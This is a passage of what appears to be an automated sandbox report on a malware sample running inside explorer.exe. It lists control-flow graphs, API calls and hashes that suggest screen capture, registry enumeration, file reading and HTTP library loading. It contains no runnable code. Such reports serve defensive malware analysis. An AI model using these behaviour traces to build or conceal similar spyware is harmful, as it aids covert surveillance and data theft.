                                                                                                                                                      • NtReadFile.NTDLL(?,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0089A2B9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: ntdll.dll
                                                                                                                                                      • API String ID: 2738559852-2227199552
                                                                                                                                                      • Opcode ID: fa6505c31bd8ebec8312b48056d9e1f0b0eddcadb5184ccc0218f3bfdc163625
                                                                                                                                                      • Instruction ID: b23d60f2c385e863b07fae3e34a10675fe0937266c603a863bb619dfae08d0f0
                                                                                                                                                      • Opcode Fuzzy Hash: fa6505c31bd8ebec8312b48056d9e1f0b0eddcadb5184ccc0218f3bfdc163625
                                                                                                                                                      • Instruction Fuzzy Hash: AF71D770A142459FDF18AF6DCC91A3DB6E4FB88714F18492EF195DA790EA26DC408B43
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ^&R0$_&R0
                                                                                                                                                      • API String ID: 0-3859528112
                                                                                                                                                      • Opcode ID: ad8ab2a2b0f89cf77d3529bcb751b970a5ec13557eef7c72d3a843a9f5bcdd5e
                                                                                                                                                      • Instruction ID: bd64f2f2c9c2108792030790dc6ea5df70ff116241ca7b84de83c0d39c519b47
                                                                                                                                                      • Opcode Fuzzy Hash: ad8ab2a2b0f89cf77d3529bcb751b970a5ec13557eef7c72d3a843a9f5bcdd5e
                                                                                                                                                      • Instruction Fuzzy Hash: 1792A2B1D043199FDF24FF98C885AFDBAB1FB14304F28452AE516FB290D7719A408B86
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 5594 8b8144-8b815e 5595 8b8163-8b8168 5594->5595 5596 8b816a-8b816f 5595->5596 5597 8b8186-8b818b 5595->5597 5598 8b8171-8b8176 5596->5598 5599 8b81b6-8b81bb 5596->5599 5600 8b81cb-8b81d0 5597->5600 5601 8b818d-8b8192 5597->5601 5602 8b8178-8b817d 5598->5602 5603 8b81f7-8b8221 call 8a988d GetProcessHeap RtlFreeHeap 5598->5603 5606 8b81bd-8b81c2 5599->5606 5607 8b8230-8b8256 5599->5607 5608 8b8266-8b826b 5600->5608 5609 8b81d6-8b81f2 call 8b8091 5600->5609 5604 8b8198-8b819d 5601->5604 5605 8b8226-8b822b 5601->5605 5602->5595 5611 8b817f-8b8184 5602->5611 5603->5595 5604->5595 5613 8b819f-8b81b4 call 8c33a0 5604->5613 5605->5595 5606->5595 5615 8b81c4-8b81c9 5606->5615 5607->5595 5612 8b825c-8b8261 5607->5612 5608->5595 5614 8b8271-8b827c 5608->5614 5609->5595 5611->5595 5612->5595 5613->5595 5615->5595
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 008B820C
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 008B8216
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                      • Opcode ID: 5088f8335fb572ac0981537a5cc96e75446c465e306f14df410cc9962c472e4f
                                                                                                                                                      • Instruction ID: 37c9dfa49e814b8f72c3b63e2b9259b2c898e14042dc94d8755a9ff57daf2efd
                                                                                                                                                      • Opcode Fuzzy Hash: 5088f8335fb572ac0981537a5cc96e75446c465e306f14df410cc9962c472e4f
                                                                                                                                                      • Instruction Fuzzy Hash: 6A21E635A0A308DFDA25561CDCC59AF769CFB963A0F208827F585C6350EA36CC56C753
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 5743 8d9d44-8d9d74 call 8d988b call 8d9915 call 8d98e9 5750 8d9d7a-8d9d86 call 8d9891 5743->5750 5751 8d9e93-8d9e9d call 8d4677 5743->5751 5750->5751 5756 8d9d8c-8d9d98 call 8d98bd 5750->5756 5756->5751 5759 8d9d9e-8d9dbf call 8d4594 GetTimeZoneInformation 5756->5759 5762 8d9dc5-8d9de5 5759->5762 5763 8d9e70-8d9e92 call 8d9885 call 8d9879 call 8d987f 5759->5763 5764 8d9def-8d9df7 5762->5764 5765 8d9de7-8d9dec 5762->5765 5767 8d9e09-8d9e0b 5764->5767 5768 8d9df9-8d9e00 5764->5768 5765->5764 5771 8d9e0d-8d9e6d call 8c3ea0 * 4 call 8d744f call 8d9d02 * 2 5767->5771 5768->5767 5770 8d9e02-8d9e07 5768->5770 5770->5771 5771->5763
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 008D4594: RtlFreeHeap.NTDLL(00000000,00000000,?,008D76D8,?,00000000,?,?,008D75F4,?,00000007,?,?,008D7D30,?,?), ref: 008D45AA
                                                                                                                                                        • Part of subcall function 008D4594: GetLastError.KERNEL32(?,?,008D76D8,?,00000000,?,?,008D75F4,?,00000007,?,?,008D7D30,?,?), ref: 008D45B5
                                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,008DA1D8,008A5109,?), ref: 008D9DB6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3335090040-0
                                                                                                                                                      • Opcode ID: fe47508c6c949f23fa556d215c6dde6e9c1588bc659e9298e4127f231e10ecb0
                                                                                                                                                      • Instruction ID: 83d1392b56248ceaf5f62b7aed6bb34abc2471d21d022c0298d4e2c1bfb2db75
                                                                                                                                                      • Opcode Fuzzy Hash: fe47508c6c949f23fa556d215c6dde6e9c1588bc659e9298e4127f231e10ecb0
                                                                                                                                                      • Instruction Fuzzy Hash: 81317C71900214AECB10AFA9DC46A6A7FA9FF05750B1582BAF544E7362E7709A00DBD2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00030473,008C0DC3), ref: 008C134E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                      • Opcode ID: 7db5dd6ce993eab5d7965a9aeadd23df12f36382f21c141477cae0e90a7b3b8c
                                                                                                                                                      • Instruction ID: db6a6f556d5fedfc704d017610487c6c5b15358feebdde5efbf349dcfe4af5f2
                                                                                                                                                      • Opcode Fuzzy Hash: 7db5dd6ce993eab5d7965a9aeadd23df12f36382f21c141477cae0e90a7b3b8c
                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,008E6812,00000000,00020019,?), ref: 008B8463
                                                                                                                                                      • RegEnumKeyExW.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000), ref: 008B8720
                                                                                                                                                      • wsprintfW.USER32 ref: 008B8AA5
                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?), ref: 008B8BA9
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?), ref: 008B8BE4
                                                                                                                                                      • _strlen.LIBCMT ref: 008B8E46
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Open$EnumQueryValue_strlenwsprintf
                                                                                                                                                      • String ID: [&T!$\&T!$\&T!$vYh$vYh
                                                                                                                                                      • API String ID: 2763413632-816245833
                                                                                                                                                      • Opcode ID: f7f2e0aee246385773fd1b5f326eec3d4ab2baca7630a652fc17869d7567c5c1
                                                                                                                                                      • Instruction ID: dc9357f43366ee56a3e59e0dae881e0c1f57f2739e73174c1f1dfc7e3eb346b8
                                                                                                                                                      • Opcode Fuzzy Hash: f7f2e0aee246385773fd1b5f326eec3d4ab2baca7630a652fc17869d7567c5c1
                                                                                                                                                      • Instruction Fuzzy Hash: 8D326CB1D0020ADFCF248FD8C9859EEBAB8FB14314F24491AE416EB360DB729941DB57
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 4035 8973f0-897429 call 8c0ce0 4038 89742a-897432 4035->4038 4039 8974a3-8974a8 4038->4039 4040 897434-897439 4038->4040 4041 8974ae-8974b3 4039->4041 4042 897575-89757a 4039->4042 4043 89743f-897444 4040->4043 4044 897526-89752b 4040->4044 4047 8974b9-8974be 4041->4047 4048 89761d-897622 4041->4048 4045 897580-897585 4042->4045 4046 8976b2-8976b7 4042->4046 4049 89744a-89744f 4043->4049 4050 8975c6-8975cb 4043->4050 4051 89765d-897662 4044->4051 4052 897531-897536 4044->4052 4055 8977d9-8977de 4045->4055 4056 89758b-897590 4045->4056 4063 8976b9-8976be 4046->4063 4064 8976ed-8976f2 4046->4064 4057 897758-89775d 4047->4057 4058 8974c4-8974c9 4047->4058 4053 897628-89762d 4048->4053 4054 89784a-89784f 4048->4054 4065 89771f-897724 4049->4065 4066 897455-89745a 4049->4066 4061 89781a-89781f 4050->4061 4062 8975d1-8975d6 4050->4062 4059 897668-89766d 4051->4059 4060 89787e-897883 4051->4060 4067 89753c-897541 4052->4067 4068 8977a2-8977a7 4052->4068 4087 8979bf-8979cc 4053->4087 4088 897633-897638 4053->4088 4069 897b0b-897b18 4054->4069 4070 897855-89785a 4054->4070 4089 897abc-897ac3 4055->4089 4090 8977e4-8977e9 4055->4090 4075 89794d-89796a 4056->4075 4076 897596-89759b 4056->4076 4081 897763-897768 4057->4081 4082 897a82-897a89 4057->4082 4091 8974cf-8974d4 4058->4091 4092 897907-89790e 4058->4092 4093 897673-897678 4059->4093 4094 897a07-897a1f GetModuleFileNameW 4059->4094 4073 897889-89788e 4060->4073 4074 897b1d-897b3a call 897b9d * 2 4060->4074 4095 897ac8-897af7 call 898378 call 8c1d1d 4061->4095 4096 897825-89782a 4061->4096 4079 8975dc-8975e1 4062->4079 4080 89798f-8979a2 GetFileSizeEx 4062->4080 4097 897a33-897a36 call 8ce964 4063->4097 4098 8976c4-8976c9 4063->4098 4071 897a59-897a64 4064->4071 4072 8976f8-8976fd 4064->4072 4077 89772a-89772f 4065->4077 4078 897a76-897a7d 4065->4078 4083 897460-897465 4066->4083 4084 8978d5-8978e4 4066->4084 4099 89791f-89792f 4067->4099 4100 897547-89754c 4067->4100 4085 8977ad-8977b2 4068->4085 4086 897a8e-897ab7 CreateFileW 4068->4086 4069->4038 4070->4038 4103 897860-897879 4070->4103 4116 897a6b-897a71 4071->4116 4117 897a66 4071->4117 4120 897b4c-897b51 4072->4120 4121 897703-89770f 4072->4121 4073->4038 4104 897894-8978c6 4073->4104 4074->4038 4109 8979ff-897a02 4075->4109 4110 897970-897975 4075->4110 4105 89797a-89798a 4076->4105 4106 8975a1-8975a6 4076->4106 4077->4038 4123 897735-897749 4077->4123 4078->4038 4107 8979a7-8979ba call 897b9d 4079->4107 4108 8975e7-8975ec 4079->4108 4080->4038 4081->4038 4124 89776e-897790 call 8c1d1d 4081->4124 4082->4038 4126 8978e9-897902 4083->4126 4127 89746b-897470 4083->4127 4084->4038 4085->4038 4128 8977b8-8977c9 4085->4128 4086->4038 4087->4038 4111 89763e-897643 4088->4111 4112 8979d1-8979f8 4088->4112 4089->4038 4090->4038 4129 8977ef-89780a call 897b9d 4090->4129 4130 8974da-8974df 4091->4130 4131 897913-89791a 4091->4131 4092->4038 4113 89767e-897683 4093->4113 4114 897a24-897a2e 4093->4114 4094->4038 4177 897af9 4095->4177 4178 897afe 4095->4178 4096->4038 4132 897830-897833 call 8ce5b4 4096->4132 4142 897a3b-897a54 4097->4142 4118 897b3f-897b44 4098->4118 4119 8976cf-8976dd 4098->4119 4099->4038 4101 897552-897557 4100->4101 4102 897934-897948 4100->4102 4101->4038 4133 89755d-897570 CloseHandle 4101->4133 4102->4038 4103->4038 4134 8978c8 4104->4134 4135 8978cd-8978d0 4104->4135 4105->4038 4106->4038 4136 8975ac-8975c1 4106->4136 4107->4038 4108->4038 4137 8975f2-89760d call 897b9d * 2 4108->4137 4109->4038 4110->4109 4111->4038 4139 897649-897658 4111->4139 4112->4109 4140 8979fa 4112->4140 4113->4038 4141 897689-8976ad ReadFile FindCloseChangeNotification 4113->4141 4114->4038 4116->4038 4117->4116 4118->4038 4151 897b4a-897b9c 4118->4151 4119->4109 4143 8976e3-8976e8 4119->4143 4120->4038 4153 897b57-897b74 ExitProcess 4120->4153 4121->4109 4144 897715-89771a 4121->4144 4146 89774b 4123->4146 4147 897750-897753 4123->4147 4172 897792 4124->4172 4173 897797-89779d 4124->4173 4126->4038 4127->4038 4150 897472-897497 4127->4150 4128->4109 4152 8977cf-8977d4 4128->4152 4129->4109 4175 897810-897815 4129->4175 4130->4038 4155 8974e5-897514 4130->4155 4131->4038 4169 897838-897845 4132->4169 4133->4038 4134->4135 4157 897b01-897b06 4135->4157 4136->4038 4137->4109 4180 897613-897618 4137->4180 4139->4038 4140->4109 4141->4038 4142->4038 4143->4109 4144->4109 4146->4147 4147->4109 4163 897499 4150->4163 4164 89749e-8974a1 4150->4164 4152->4109 4167 89751b-897521 4155->4167 4168 897516 4155->4168 4157->4038 4163->4164 4164->4038 4167->4038 4168->4167 4169->4038 4172->4173 4173->4038 4175->4109 4177->4178 4178->4157 4180->4109
                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00897560
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00897697
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 008976A0
                                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?), ref: 00897995
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00897A12
                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00897AA7
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00897B74
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Close$ChangeCreateExitFindHandleModuleNameNotificationProcessReadSize
                                                                                                                                                      • String ID: \&T!$\&T!
                                                                                                                                                      • API String ID: 394432249-1308122536
                                                                                                                                                      • Opcode ID: d9c743573879e986a3e69cf40868b06808e8220479a734038bed6202882e9bf6
                                                                                                                                                      • Instruction ID: a47f10f592d3e29035e80fda12590114e930bca52147c66cc0b0afa6f331d128
                                                                                                                                                      • Opcode Fuzzy Hash: d9c743573879e986a3e69cf40868b06808e8220479a734038bed6202882e9bf6
                                                                                                                                                      • Instruction Fuzzy Hash: A902B370628B05CFCF34AF58C59562ABBE0FB547147288D2ED89BC7B61E234F8518B16
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 4611 8cca65-8cca7e 4613 8cca80-8cca91 call 8cbbc6 call 8d4667 4611->4613 4614 8cca93-8ccaa3 4611->4614 4634 8ccae6-8ccae8 4613->4634 4615 8ccab8-8ccabe 4614->4615 4616 8ccaa5-8ccab6 call 8cbbc6 call 8d4667 4614->4616 4620 8ccac6-8ccacc 4615->4620 4621 8ccac0 4615->4621 4639 8ccae5 4616->4639 4626 8ccace 4620->4626 4627 8ccae9 call 8d9c2e 4620->4627 4624 8ccad8-8ccae2 call 8cbbc6 4621->4624 4625 8ccac2-8ccac4 4621->4625 4637 8ccae4 4624->4637 4625->4620 4625->4624 4626->4624 4632 8ccad0-8ccad6 4626->4632 4635 8ccaee-8ccb03 call 8d9891 4627->4635 4632->4624 4632->4627 4641 8ccb09-8ccb15 call 8d98bd 4635->4641 4642 8cccf4-8cccfe call 8d4677 4635->4642 4637->4639 4639->4634 4641->4642 4647 8ccb1b-8ccb27 call 8d98e9 4641->4647 4647->4642 4650 8ccb2d-8ccb42 4647->4650 4651 8ccb44 4650->4651 4652 8ccbb2-8ccbbd call 8d9950 4650->4652 4653 8ccb4e-8ccb6a call 8d9950 4651->4653 4654 8ccb46-8ccb4c 4651->4654 4652->4637 4658 8ccbc3-8ccbce 4652->4658 4653->4637 4662 8ccb70-8ccb73 4653->4662 4654->4652 4654->4653 4660 8ccbea 4658->4660 4661 8ccbd0-8ccbd9 call 8d9bda 4658->4661 4664 8ccbed-8ccc01 call 8da550 4660->4664 4661->4660 4670 8ccbdb-8ccbe8 4661->4670 4665 8ccced-8cccef 4662->4665 4666 8ccb79-8ccb82 call 8d9bda 4662->4666 4673 8ccc0e-8ccc35 call 8d8960 call 8da550 4664->4673 4674 8ccc03-8ccc0b 4664->4674 4665->4637 4666->4665 4675 8ccb88-8ccba0 call 8d9950 4666->4675 4670->4664 4683 8ccc37-8ccc40 4673->4683 4684 8ccc43-8ccc6a call 8d8960 call 8da550 4673->4684 4674->4673 4675->4637 4680 8ccba6-8ccbad 4675->4680 4680->4665 4683->4684 4689 8ccc6c-8ccc75 4684->4689 4690 8ccc78-8ccc87 call 8d8960 4684->4690 4689->4690 4693 8cccaf-8ccccd 4690->4693 4694 8ccc89 4690->4694 4695 8ccccf-8ccce8 4693->4695 4696 8cccea 4693->4696 4697 8ccc8f-8ccca3 4694->4697 4698 8ccc8b-8ccc8d 4694->4698 4695->4665 4696->4665 4697->4665 4698->4697 4699 8ccca5-8ccca7 4698->4699 4699->4665 4700 8ccca9 4699->4700 4700->4693 4701 8cccab-8cccad 4700->4701 4701->4665 4701->4693
                                                                                                                                                      APIs
                                                                                                                                                      • __allrem.LIBCMT ref: 008CCBF8
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008CCC14
                                                                                                                                                      • __allrem.LIBCMT ref: 008CCC2B
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008CCC49
                                                                                                                                                      • __allrem.LIBCMT ref: 008CCC60
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008CCC7E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                                      • Opcode ID: 0311785a7529f31dd91a8fde15ec96c91375ead30ef5ac0c05c8c377e2f3f5f6
                                                                                                                                                      • Instruction ID: dc28aec98b8d9c907009e018cafa0bfe863234876edf24df78c0f73ce86e5099
                                                                                                                                                      • Opcode Fuzzy Hash: 0311785a7529f31dd91a8fde15ec96c91375ead30ef5ac0c05c8c377e2f3f5f6
                                                                                                                                                      • Instruction Fuzzy Hash: 8881C2B1600B1AABE724DF6CCC82F6AB3B9FF45724F24462EE459D6781E770D9008791
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 4702 8b7cc0-8b7ce2 4703 8b7ce4-8b7ce9 4702->4703 4704 8b7ceb-8b7cf0 4703->4704 4705 8b7d1c-8b7d21 4703->4705 4706 8b7cf2-8b7cf7 4704->4706 4707 8b7d56-8b7d5b 4704->4707 4708 8b7d23-8b7d28 4705->4708 4709 8b7d95-8b7d9a 4705->4709 4710 8b7cfd-8b7d02 4706->4710 4711 8b7da6-8b7dab 4706->4711 4714 8b7d5d-8b7d62 4707->4714 4715 8b7dc4-8b7de3 4707->4715 4712 8b7d2e-8b7d33 4708->4712 4713 8b7db0-8b7dbf 4708->4713 4716 8b7de8-8b7ded 4709->4716 4717 8b7d9c-8b7da1 4709->4717 4710->4703 4718 8b7d04-8b7d1a 4710->4718 4711->4703 4712->4703 4720 8b7d35-8b7d54 CreateCompatibleDC CreateCompatibleBitmap 4712->4720 4713->4703 4714->4703 4721 8b7d64-8b7d90 BitBlt 4714->4721 4715->4703 4716->4703 4719 8b7df3-8b7e15 DeleteDC DeleteObject 4716->4719 4717->4703 4718->4703 4720->4703 4721->4703
                                                                                                                                                      APIs
                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 008B7D36
                                                                                                                                                      • CreateCompatibleBitmap.GDI32(?,?,?), ref: 008B7D45
                                                                                                                                                      • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 008B7D85
                                                                                                                                                      • DeleteDC.GDI32 ref: 008B7DFA
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 008B7E04
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CompatibleCreateDelete$BitmapObject
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 418092405-0
                                                                                                                                                      • Opcode ID: 6e4faa0b39a9cc9e3e5d4aa2ba0819d98098b63a5d0b0067b7482abf084a04f3
                                                                                                                                                      • Instruction ID: a8db767e62fe83d706219d049ea62e5b5e1ae38c6efb1f2b57b4c49dcf3da3c0
                                                                                                                                                      • Opcode Fuzzy Hash: 6e4faa0b39a9cc9e3e5d4aa2ba0819d98098b63a5d0b0067b7482abf084a04f3
                                                                                                                                                      • Instruction Fuzzy Hash: 7A318B3150C385AB8B208B29CD848BEBEA8FFC5798F14896FF159CA360C335D951DB52
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 4724 8b7f64-8b7f85 GetSystemMetrics 4725 8b7f8b-8b7f91 4724->4725 4726 8b7faa-8b7fb0 4725->4726 4727 8b7f93-8b7f99 4725->4727 4730 8b7fb2-8b7fbb 4726->4730 4731 8b7fc4-8b7fca 4726->4731 4728 8b7f9b-8b7fa1 4727->4728 4729 8b7fbd-8b7fc2 4727->4729 4728->4725 4732 8b7fa3-8b7fa8 4728->4732 4729->4725 4730->4725 4731->4725 4733 8b7fcc-8b8010 CreateDCW call 8b7cc0 4731->4733 4732->4725 4736 8b8015-8b8028 DeleteDC 4733->4736
                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemMetrics.USER32(00000000), ref: 008B7F6B
                                                                                                                                                      • CreateDCW.GDI32(?,00000000,00000000,00000000), ref: 008B8000
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 008B801B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDeleteMetricsSystem
                                                                                                                                                      • String ID: DISPLAY
                                                                                                                                                      • API String ID: 2464958881-865373369
                                                                                                                                                      • Opcode ID: 0b4acf09ae508e681e129e96b8e69432e228678b819663d4971aa6f05c767d62
                                                                                                                                                      • Instruction ID: d359b73e22f29232826fb7315ab886f658291a77e06fceb9329c6ad79549fecd
                                                                                                                                                      • Opcode Fuzzy Hash: 0b4acf09ae508e681e129e96b8e69432e228678b819663d4971aa6f05c767d62
                                                                                                                                                      • Instruction Fuzzy Hash: 0911B67090C300AFD7089F68EC999797BB5FBA8344F10805EF84ACB3A1DA756C50CB5A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 5199 8ab96e-8aba9e call 8be364 * 4 call 8cddca wsprintfW call 8be364 * 3 5223 8abaa3-8abaa9 5199->5223 5224 8abaea-8abaf0 5223->5224 5225 8abaab-8abab1 5223->5225 5226 8abb52-8abb58 5224->5226 5227 8abaf2-8abaf8 5224->5227 5228 8abb19-8abb1f 5225->5228 5229 8abab3-8abab9 5225->5229 5230 8abb5e-8abb64 5226->5230 5231 8abbf1-8abbfb 5226->5231 5232 8abafe-8abb04 5227->5232 5233 8abba6-8abbb0 5227->5233 5234 8abbc0-8abbe1 call 8be364 5228->5234 5235 8abb25-8abb2b 5228->5235 5236 8ababf-8abac5 5229->5236 5237 8abb84-8abba1 call 8be364 5229->5237 5230->5223 5238 8abb6a-8abb74 5230->5238 5231->5223 5239 8abc01-8abc06 5231->5239 5232->5223 5241 8abb06-8abb10 5232->5241 5233->5223 5242 8abbb6-8abbbb 5233->5242 5234->5223 5258 8abbe7-8abbec 5234->5258 5235->5223 5243 8abb31-8abb43 call 8be364 5235->5243 5245 8abc0b-8abc11 5236->5245 5246 8abacb-8abae8 call 8be364 5236->5246 5237->5223 5238->5223 5248 8abb7a-8abb7f 5238->5248 5239->5223 5241->5223 5251 8abb12-8abb17 5241->5251 5242->5223 5260 8abb48-8abb4d 5243->5260 5245->5223 5249 8abc17-8abc22 5245->5249 5246->5223 5248->5223 5251->5223 5258->5223 5260->5223
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wsprintf
                                                                                                                                                      • String ID: winhttp.dll
                                                                                                                                                      • API String ID: 2111968516-4126855447
                                                                                                                                                      • Opcode ID: 25b79d3326ad1207203fc6ec360945d3a34d4737460fb0a8574124fba6a9aced
                                                                                                                                                      • Instruction ID: bedaa750e00ba97454d35cbe38956e35d5f46e90c34dc373afa5e91665cf0e69
                                                                                                                                                      • Opcode Fuzzy Hash: 25b79d3326ad1207203fc6ec360945d3a34d4737460fb0a8574124fba6a9aced
                                                                                                                                                      • Instruction Fuzzy Hash: 91512370908300BFE6245E258C16FAFBAE4FFD6B95F00092DFA55E2791D7266904C673
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
